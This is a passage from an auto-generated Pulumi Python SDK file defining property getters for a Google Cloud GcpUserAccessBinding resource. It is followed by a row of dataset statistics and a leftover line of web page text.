Immutable. Assigned by the server during creation. The last segment has an arbitrary length and has only URI unreserved
characters (as defined by RFC 3986 Section 2.3). Should not be specified by the client during creation. Example:
"organizations/256/gcpUserAccessBindings/b3-BhcX_Ud5N"
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="organizationId")
def organization_id(self) -> pulumi.Output[str]:
"""
Required. ID of the parent organization.
"""
return pulumi.get(self, "organization_id")
| 53.533981 | 387 | 0.688429 | 2,035 | 16,542 | 5.427027 | 0.114496 | 0.048805 | 0.05958 | 0.043825 | 0.826512 | 0.802608 | 0.777345 | 0.760413 | 0.749457 | 0.734969 | 0 | 0.009152 | 0.227179 | 16,542 | 308 | 388 | 53.707792 | 0.85474 | 0.484887 | 0 | 0.530488 | 1 | 0 | 0.11154 | 0.011579 | 0 | 0 | 0 | 0 | 0 | 1 | 0.152439 | false | 0.006098 | 0.030488 | 0 | 0.27439 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.